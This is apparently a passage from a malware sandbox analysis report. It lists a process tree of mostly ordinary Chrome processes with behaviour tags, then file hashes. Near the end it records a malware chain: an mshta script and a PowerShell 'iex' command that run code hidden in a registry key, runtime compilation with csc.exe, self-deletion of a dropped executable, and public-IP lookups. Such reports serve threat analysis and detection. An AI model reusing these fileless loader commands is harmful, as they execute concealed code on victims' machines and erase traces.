C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6600 /prefetch:83⤵PID:4832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6932 /prefetch:83⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7016 /prefetch:83⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6020 /prefetch:83⤵PID:4964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6456 /prefetch:83⤵PID:4264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6556 /prefetch:83⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6424 /prefetch:83⤵PID:1772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6508 /prefetch:83⤵PID:4524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:83⤵PID:4508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6348 /prefetch:83⤵PID:4480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7716 /prefetch:83⤵PID:4828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:83⤵PID:4776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3580 /prefetch:83⤵PID:4976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3612 /prefetch:83⤵PID:4896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:83⤵PID:4364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:83⤵PID:4604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6808 /prefetch:83⤵PID:5068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:83⤵PID:2820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4232 /prefetch:83⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4072 /prefetch:83⤵PID:4244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7444 /prefetch:83⤵PID:4760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4136 /prefetch:83⤵PID:4240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4148 /prefetch:83⤵PID:2844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4124 /prefetch:83⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8064 /prefetch:13⤵PID:3304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:13⤵PID:1676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7676 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:13⤵PID:184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6636 /prefetch:83⤵PID:5000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8092 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4288 /prefetch:83⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7052 /prefetch:83⤵PID:4816
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:83⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5148 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5780 /prefetch:83⤵PID:2308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8104 /prefetch:83⤵PID:4408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3748 /prefetch:83⤵PID:4908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8076 /prefetch:83⤵PID:3128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3616 /prefetch:83⤵PID:4304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3648 /prefetch:83⤵PID:1552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2308 /prefetch:83⤵PID:2648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3640 /prefetch:83⤵PID:4964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:83⤵PID:4492
-
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\92.267.200\software_reporter_tool.exe"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\92.267.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=YuUakMh14Of+ifD3E9DcDUMUHiNZQ9R9gAYwtYM+ --registry-suffix=ESET --srt-field-trial-group-name=Off3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4100 -
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=92.267.200 --initial-client-data=0x264,0x268,0x26c,0x234,0x270,0x7ff6751062b0,0x7ff6751062c0,0x7ff6751062d04⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4100_NBCOBJYSBTVZUKGX" --sandboxed-process-id=2 --init-done-notifier=740 --sandbox-mojo-pipe-token=3948679689021656927 --mojo-platform-channel-handle=716 --engine=24⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe"c:\users\admin\appdata\local\google\chrome\user data\swreporter\92.267.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_4100_NBCOBJYSBTVZUKGX" --sandboxed-process-id=3 --init-done-notifier=944 --sandbox-mojo-pipe-token=10498607416324527051 --mojo-platform-channel-handle=9404⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4200
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3768 /prefetch:83⤵PID:4108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7516 /prefetch:83⤵PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5880 /prefetch:83⤵PID:4072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1616,4424563469904897318,17386223617033068823,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 /prefetch:83⤵PID:4504
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>M9de='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(M9de).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\069CA786-AD43-2851-679A-31DC8B6EF5D0\\\MaskStop'));if(!window.flag)close()</script>"2⤵PID:4400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\069CA786-AD43-2851-679A-31DC8B6EF5D0").ComputerSettings))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:4736 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zexki0ea\zexki0ea.cmdline"4⤵PID:4696
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A8B.tmp" "c:\Users\Admin\AppData\Local\Temp\zexki0ea\CSC1651E803854A45489885A281FB4B967.TMP"5⤵PID:1824
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x5zyi42l\x5zyi42l.cmdline"4⤵PID:4180
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5BC3.tmp" "c:\Users\Admin\AppData\Local\Temp\x5zyi42l\CSCF0F7FE236F85430185A55891FE74D919.TMP"5⤵PID:4428
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\BouncyDotNET.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:3244 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4252
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\81DD.bi1"2⤵PID:4160
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:2052
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\86C9.bi1"2⤵PID:5012
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1864
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\86C9.bi1"2⤵PID:4484
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\81DD.bi1"2⤵PID:2940
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
045eca8799b12fe16861f0e5f4503ff2
SHA1f093b2fc72fce4daadab47fbec01a9579cc71a5f
SHA25697808e4552a2892352322ff4d8333dbf1acea73c330ed09b96d9b758cf4f6fd9
SHA512612c6549cd79b3213cbb9d53435885ee52d2cbc0b3a1a582e788c22e408fe33cad0b942c7b7876a32e61272e2e1e5cb1e3fc9e5761395fab789369c35f159fae
-
MD5
8a24adf60923719e71306f56deb49ebc
SHA1e098600fd5a98bc37d0d887e705a32a54bf4ae84
SHA256221643457442624e98646e2e6f8a6ec7d8d79f9830d13cb168f69e60e69b0085
SHA512dfbc2fcd389e07c4a2fcf7ce440f079022bc40c1b957c6bd89e7dc33695c0e80b5ecbcc823c44c68f80ce791ee065d39d7042b0579f736c786451f0183c6c02a
-
MD5
8a24adf60923719e71306f56deb49ebc
SHA1e098600fd5a98bc37d0d887e705a32a54bf4ae84
SHA256221643457442624e98646e2e6f8a6ec7d8d79f9830d13cb168f69e60e69b0085
SHA512dfbc2fcd389e07c4a2fcf7ce440f079022bc40c1b957c6bd89e7dc33695c0e80b5ecbcc823c44c68f80ce791ee065d39d7042b0579f736c786451f0183c6c02a
-
MD5
e70951807abdec39daefa9a8df9dec15
SHA115a7b0f9c04d5f6bba477d91b502b4e24c1127f6
SHA256dee1253761af168e331e8909cf6afb20b40a95a34400d9717773a77258ac62e6
SHA512bd87a44e078a9e589b70419f9ba876e067bc549679962faf0a5f96d5f0d0167654adb53b2b10e065de8f705bfa51b0fed09fb3ce28d5014e4260b96dc64fa624
-
MD5
e70951807abdec39daefa9a8df9dec15
SHA115a7b0f9c04d5f6bba477d91b502b4e24c1127f6
SHA256dee1253761af168e331e8909cf6afb20b40a95a34400d9717773a77258ac62e6
SHA512bd87a44e078a9e589b70419f9ba876e067bc549679962faf0a5f96d5f0d0167654adb53b2b10e065de8f705bfa51b0fed09fb3ce28d5014e4260b96dc64fa624
-
MD5
2b622a85fd2b0b5531c86301818ceb2f
SHA15e1d127789e78683ce3deee1fd3e38f358bc50c2
SHA25658489a55f9eb210b9e472ca21621ce544e03a2e026f0fa103c1a58102d39c025
SHA512938d7ac9239568536a341c057a44142faad4921bbff5bcc76a89b0b4ed5343f324a46e6c533a9673434286673c4b5efbe4a8156d10c20a2760389ac785a34ce4
-
MD5
4240767ecbcecd84f3c90d0ee889460c
SHA1d390f9e165408864dda6c925dfe6627c557a6b24
SHA2561d1e59b6a67e1f4ecc8516c384291655d4c51f7f91168e6b593f5f8919bffdc3
SHA51289fe2e6cc6a1480d8a42efe2b694b3b677967b7656326fcf8453c7f484d92f450be65c6c2639cd08131dbc58e0d34ee696bf1b263227e34d2ac91c4aaa7aee61
-
MD5
a43be7341e3d13810d20b9e64e329c83
SHA1ad582a30ba365885be34fe503c744088d08b4baa
SHA256e2c83783d6ab57ac91d99bfb9d607d0b5537e305661406bbf2347c3af92d3464
SHA512cf79fcf60158a33adb39351b4626e8012e737acf4633b882c75240b21480ac1cc91e811c8b351f6e499b689d15b87054cc185c5d54e8e0d628b8b13bfc3bd877
-
MD5
a43be7341e3d13810d20b9e64e329c83
SHA1ad582a30ba365885be34fe503c744088d08b4baa
SHA256e2c83783d6ab57ac91d99bfb9d607d0b5537e305661406bbf2347c3af92d3464
SHA512cf79fcf60158a33adb39351b4626e8012e737acf4633b882c75240b21480ac1cc91e811c8b351f6e499b689d15b87054cc185c5d54e8e0d628b8b13bfc3bd877
-
MD5
a43be7341e3d13810d20b9e64e329c83
SHA1ad582a30ba365885be34fe503c744088d08b4baa
SHA256e2c83783d6ab57ac91d99bfb9d607d0b5537e305661406bbf2347c3af92d3464
SHA512cf79fcf60158a33adb39351b4626e8012e737acf4633b882c75240b21480ac1cc91e811c8b351f6e499b689d15b87054cc185c5d54e8e0d628b8b13bfc3bd877
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
4240767ecbcecd84f3c90d0ee889460c
SHA1d390f9e165408864dda6c925dfe6627c557a6b24
SHA2561d1e59b6a67e1f4ecc8516c384291655d4c51f7f91168e6b593f5f8919bffdc3
SHA51289fe2e6cc6a1480d8a42efe2b694b3b677967b7656326fcf8453c7f484d92f450be65c6c2639cd08131dbc58e0d34ee696bf1b263227e34d2ac91c4aaa7aee61